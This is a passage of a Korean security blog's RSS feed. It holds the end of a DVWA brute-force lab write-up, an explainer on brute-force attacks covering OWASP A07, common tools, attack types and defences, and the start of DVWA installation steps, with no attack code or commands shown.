href=&quot;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://blog.g0tmi1k.com/dvwa/bruteforce-high/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/uJsEB/hyX0k7kur3/gZ3UhAISNXzJYkDI7U1c01/img.png?width=1395&amp;amp;height=755&amp;amp;face=0_0_1395_755,https://scrap.kakaocdn.net/dn/cVe3vO/hyX0rSXfwi/iSLctyKqCLXkRpeArNtHe1/img.png?width=1139&amp;amp;height=830&amp;amp;face=0_0_1139_830,https://scrap.kakaocdn.net/dn/lRuH7/hyX0o2ZrM7/eC9uxLuIkmypziyYZZL6t0/img.png?width=900&amp;amp;height=371&amp;amp;face=0_0_900_371');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;DVWA - Brute Force (High Level) - Anti-CSRF Tokens - g0tmi1k&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;This is the final &quot;how to&quot; guide which brute focuses Damn Vulnerable Web Application (DVWA), this time on the high security level. It is an expansion from the &quot;low&quot; level (which is a straightforward HTTP GET form attack). The main login screen shares simil&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;blog.g0tmi1k.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위의 코드를 실행하면, `Username`과 `Password` 획득이 가능하다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;746&quot; data-origin-height=&quot;191&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/3aR3U/btsLM3DR5WC/frKAti6P3z9AAcQzSsrUMk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/3aR3U/btsLM3DR5WC/frKAti6P3z9AAcQzSsrUMk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/3aR3U/btsLM3DR5WC/frKAti6P3z9AAcQzSsrUMk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F3aR3U%2FbtsLM3DR5WC%2FfrKAti6P3z9AAcQzSsrUMk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;189&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;746&quot; data-origin-height=&quot;191&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;288&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cksFzs/btsLNNAxq34/2E3rLCMONegOKd9XPJSey1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cksFzs/btsLNNAxq34/2E3rLCMONegOKd9XPJSey1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cksFzs/btsLNNAxq34/2E3rLCMONegOKd9XPJSey1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcksFzs%2FbtsLNNAxq34%2F2E3rLCMONegOKd9XPJSey1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;295&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;288&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;670&quot; data-origin-height=&quot;337&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bSNeTV/btsLNAupjgt/YU2qibeLk7gWS1EwiYCopK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bSNeTV/btsLNAupjgt/YU2qibeLk7gWS1EwiYCopK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bSNeTV/btsLNAupjgt/YU2qibeLk7gWS1EwiYCopK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbSNeTV%2FbtsLNAupjgt%2FYU2qibeLk7gWS1EwiYCopK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;670&quot; height=&quot;337&quot; data-origin-width=&quot;670&quot; data-origin-height=&quot;337&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;  4. Impossible&amp;nbsp;Level&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;682&quot; data-origin-height=&quot;324&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ddtE1q/btsLOvlv6uI/JIoITChiMhU9swkk1up5s1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ddtE1q/btsLOvlv6uI/JIoITChiMhU9swkk1up5s1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ddtE1q/btsLOvlv6uI/JIoITChiMhU9swkk1up5s1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FddtE1q%2FbtsLOvlv6uI%2FJIoITChiMhU9swkk1up5s1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;682&quot; height=&quot;324&quot; data-origin-width=&quot;682&quot; data-origin-height=&quot;324&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;로그인에 한번 실패하며, 15분 뒤에 로그인 시도가 가능하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사실상 brute force 공격 시간이 너무 많이 들기 때문에 성공하는 것은 불가능에 가깝다고 볼 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/DVWA 실습</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/657</guid>
      <comments>https://jennana.tistory.com/657#entry657comment</comments>
      <pubDate>Wed, 15 Jan 2025 20:00:34 +0900</pubDate>
    </item>
    <item>
      <title>[웹 해킹] Brute Force (브루트포스 공격, 무차별 대입 공격)</title>
      <link>https://jennana.tistory.com/656</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[웹 해킹] Brute Force&amp;nbsp;&lt;/b&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;(브루트포스 공격, 무차별 대입 공격, 무작위 대입 공격)&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;1. 개요&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;인증 시스템을 뚫기 위해서 &lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;가능한 모든 조합&lt;/b&gt;&lt;/span&gt;의 비밀번호 또는 키를 시도하는 공격 기법. 이 공격은 시스템의 취약점을 찾기 위한 가장 기본적인 방법 중에 하나로 단순하지만 성공 가능성이 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;대부분의 암호화 방식은 이론적으로 무차별 대입 공격에 대해서 안전하지 못하며, 충분한 시간이 존재하면 암호화된 정보를 해독이 가능함. 하지만, 대부분의 경우 비용이나 시간의 제약 때문에 공격을 방지함.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;✔ [참고] &lt;br /&gt;AES 암호 (현재 가장 강력하고 널리 사용되는 암호)가 안전한 이유&lt;/b&gt;&lt;br /&gt;AES-128: 키 길이 128비트 &amp;rarr; 2^128 가지 키 조합.&lt;br /&gt;AES-192: 키 길이 192비트 &amp;rarr; 2^192 가지 키 조합.&lt;br /&gt;AES-256: 키 길이 256비트 &amp;rarr; 2^256 가지 키 조합.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;무차별 대입공격으로 암호를 푸는데 필요한 시간을 계산하면&lt;/b&gt;&lt;br /&gt;AES-128: 2^128 &amp;asymp; 3.4&amp;times;10^38&lt;br /&gt;현재 슈퍼컴퓨터로 초당 10^18번의 키를 검사한다고 가정 시, 평균적으로 1.08 x 10^19년이 걸림. 이는 우주의 나이(약 137억 년)를 훨씬 초과&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2021 OWASP TOP 10 중에서는 `Identification and Authentication Failures` 항목에 해당된다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bvfeeY/btsLOvZ4l0w/rHYnh0KRBMWbpB6SDoVmkK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bvfeeY/btsLOvZ4l0w/rHYnh0KRBMWbpB6SDoVmkK/img.png&quot; data-alt=&quot;OWASP TOP 10&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bvfeeY/btsLOvZ4l0w/rHYnh0KRBMWbpB6SDoVmkK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbvfeeY%2FbtsLOvZ4l0w%2FrHYnh0KRBMWbpB6SDoVmkK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2000&quot; height=&quot;551&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;OWASP TOP 10&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;OWASP 07. Identification and Authentication Failures&lt;/b&gt;&lt;br /&gt;사용자의 신원 확인, 인증 및 세션 관리가 인증 관련 공격으로부터 보호하는 데 중요합니다. 애플리케이션에 다음과 같은 경우 인증 취약점이 있을 수 있습니다. &lt;br /&gt;&lt;br /&gt;- 공격자가 유효한 사용자 이름과 비밀번호 목록을 가지고 있는 자격 증명 스터핑과 같은 자동화된 공격을 허용합니다. &lt;br /&gt;- 무차별 대입 공격 또는 기타 자동화된 공격을 허용합니다. &lt;br /&gt;- &quot;Password1&quot; 또는 &quot;admin/admin&quot;과 같은 기본, 약하거나 잘 알려진 비밀번호를 허용합니다. &lt;br /&gt;- 안전할 수 없는 &quot;지식 기반 답변&quot;과 같은 약하거나 비효율적인 자격 증명 복구 및 비밀번호 분실 프로세스를 사용합니다.&lt;br /&gt;- 일반 텍스트, 암호화 또는 약하게 해시된 비밀번호 데이터 저장소를 사용합니다(A02:2021-암호화 실패 참조). &lt;br /&gt;- 누락되거나 비효율적인 다중 요소 인증이 있습니다. &lt;br /&gt;- URL에 세션 식별자를 노출합니다. &lt;br /&gt;- 로그인에 성공한 후 세션 식별자를 재사용합니다. &lt;br /&gt;- 세션 ID를 올바르게 무효화하지 않습니다. 사용자 세션 또는 인증 토큰(주로 SSO(Single Sign-On) 토큰)은 로그아웃 또는 비활성 기간 동안 적절하게 무효화되지 않습니다.&lt;/blockquote&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;공격 사례&lt;/blockquote&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;462&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwjo9K/btsLOrXLVwC/xHKW5ehE3ZvqqfPcUxiYd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwjo9K/btsLOrXLVwC/xHKW5ehE3ZvqqfPcUxiYd0/img.png&quot; data-alt=&quot;보안뉴스, https://www.boannews.com/media/view.asp?idx=70835&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwjo9K/btsLOrXLVwC/xHKW5ehE3ZvqqfPcUxiYd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbwjo9K%2FbtsLOrXLVwC%2FxHKW5ehE3ZvqqfPcUxiYd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;851&quot; height=&quot;462&quot; data-origin-width=&quot;851&quot; data-origin-height=&quot;462&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;보안뉴스, https://www.boannews.com/media/view.asp?idx=70835&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;2. 자동화 도구&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Hydra&lt;/b&gt;:&amp;nbsp;네트워크 서비스 및 웹 로그인 크래킹에 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- John the Ripper&lt;/b&gt;: 암호 해시 크래킹에 특화된 도구&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Medusa&lt;/b&gt;: 병렬로 빠르게 로그인 공격을 실행할 수 있는 도구&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Burp Suite&lt;/b&gt;: 웹 애플리케이션 보안 테스트 도구로, 무차별 대입 공격을 구성 가능&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;3. 공격 유형&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 단순 무차별 대입 공격&lt;/b&gt; : 가능한 모든 조합을 순차적으로 시도. 보안 설정이 약하거나 짧고 간단한 비밀번호를 사용하는 시스템에 효과적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 사전 공격(Dictionary Attack)&lt;/b&gt; : 사전에 준비된 일반적인 비밀번호 목록을 이용. (대부분의 사람들은 완전히 무작위적인 비밀번호를 사용하지 않기 때문)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 하이브리드 공격&lt;/b&gt; : 사전 공격과 단순 무차별 대입 공격을 결합한 형태. 사전에 저장된 단어에 숫자나 특수문자를 추가하여 조합을 시도&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;4. 방어 방법&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 강력한 비밀번호 정책&lt;/b&gt;&amp;nbsp;: 비밀 번호를 길고 복잡하게 설정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 로그인 시도 제한 :&lt;/b&gt; 일정 횟수 이상 비밀번호를 틀리면 계정 잠금&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 캡차(CAPTCHA) 도입&lt;/b&gt;&amp;nbsp;: 로그인 과정에서 캡차를 추가하여 자동화된 공격 방지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;b&gt;-&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; 이중인증(2FA)&lt;/b&gt;&amp;nbsp;: 비밀번호 이외에 추가 인증 단계를 요구.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1736857418986&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Blocking Brute Force Attacks | OWASP Foundation&quot; data-og-description=&quot;Blocking Brute Force Attacks on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&quot; data-og-host=&quot;owasp.org&quot; data-og-source-url=&quot;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&quot; data-og-url=&quot;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/QocKu/hyX0lZvIGv/J6tPku6rWjI6ICoA825e81/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64&quot;&gt;&lt;a href=&quot;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/QocKu/hyX0lZvIGv/J6tPku6rWjI6ICoA825e81/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Blocking Brute Force Attacks | OWASP Foundation&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Blocking Brute Force Attacks on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;owasp.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1736858931986&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;A07 Identification and Authentication Failures - OWASP Top 10:2021&quot; data-og-description=&quot;A07:2021 &amp;ndash; Identification and Authentication Failures Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 22 14.84% 2.55% 7.40 6.50 79.51% 45.72% 132,19&quot; data-og-host=&quot;owasp.org&quot; data-og-source-url=&quot;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&quot; data-og-url=&quot;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/kLjKs/hyX0vHNVIZ/aNKUZF03KSlp9vtpzkx4ik/img.png?width=591&amp;amp;height=592&amp;amp;face=0_0_591_592&quot;&gt;&lt;a href=&quot;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/kLjKs/hyX0vHNVIZ/aNKUZF03KSlp9vtpzkx4ik/img.png?width=591&amp;amp;height=592&amp;amp;face=0_0_591_592');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;A07 Identification and Authentication Failures - OWASP Top 10:2021&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;A07:2021 &amp;ndash; Identification and Authentication Failures Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 22 14.84% 2.55% 7.40 6.50 79.51% 45.72% 132,19&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;owasp.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/웹 해킹</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/656</guid>
      <comments>https://jennana.tistory.com/656#entry656comment</comments>
      <pubDate>Tue, 14 Jan 2025 22:30:44 +0900</pubDate>
    </item>
    <item>
      <title>[웹 보안] DVWA 설치하기</title>
      <link>https://jennana.tistory.com/655</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[웹 보안] DVWA 설치하기&lt;/b&gt;&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;533&quot; data-origin-height=&quot;324&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/codwMs/btsLJDlh7c6/zMPz0DA1fNDMoAn2CR3aK1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/codwMs/btsLJDlh7c6/zMPz0DA1fNDMoAn2CR3aK1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/codwMs/btsLJDlh7c6/zMPz0DA1fNDMoAn2CR3aK1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcodwMs%2FbtsLJDlh7c6%2FzMPz0DA1fNDMoAn2CR3aK1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;533&quot; height=&quot;324&quot; data-origin-width=&quot;533&quot; data-origin-height=&quot;324&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;*이글은 과거에 DVWA로 실습했던 글을 다시올리는거여서 현재 버전과 맞지 않을 수 있음*&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;1. DVWA 개요&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;DVWA(Damn Vunlerable Web Application)은 취약한 웹 어플리케이션으로 웹 모의해킹을 연습하기 위한 어플리케이션&lt;br /&gt;DVWA는 리눅스기반의 OS에서 `Apache` + `PHP` + `MySQL(또는 MariaDB)`로 이루어져있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;2. Kali Linux에 DVWA 설치하기&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  &lt;b&gt;Kali Linux&lt;/b&gt;&amp;nbsp;설치하기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) &lt;a href=&quot;https://www.kali.org/downloads/&quot;&gt;https://www.kali.org/downloads/&lt;/a&gt; 에서 ios다운&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) Oracle VM VirtualBox에 ios파일을 넣어서 설치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  &lt;b&gt;DVWA&lt;/b&gt; 설치하기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) 설치파일 다운받기&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
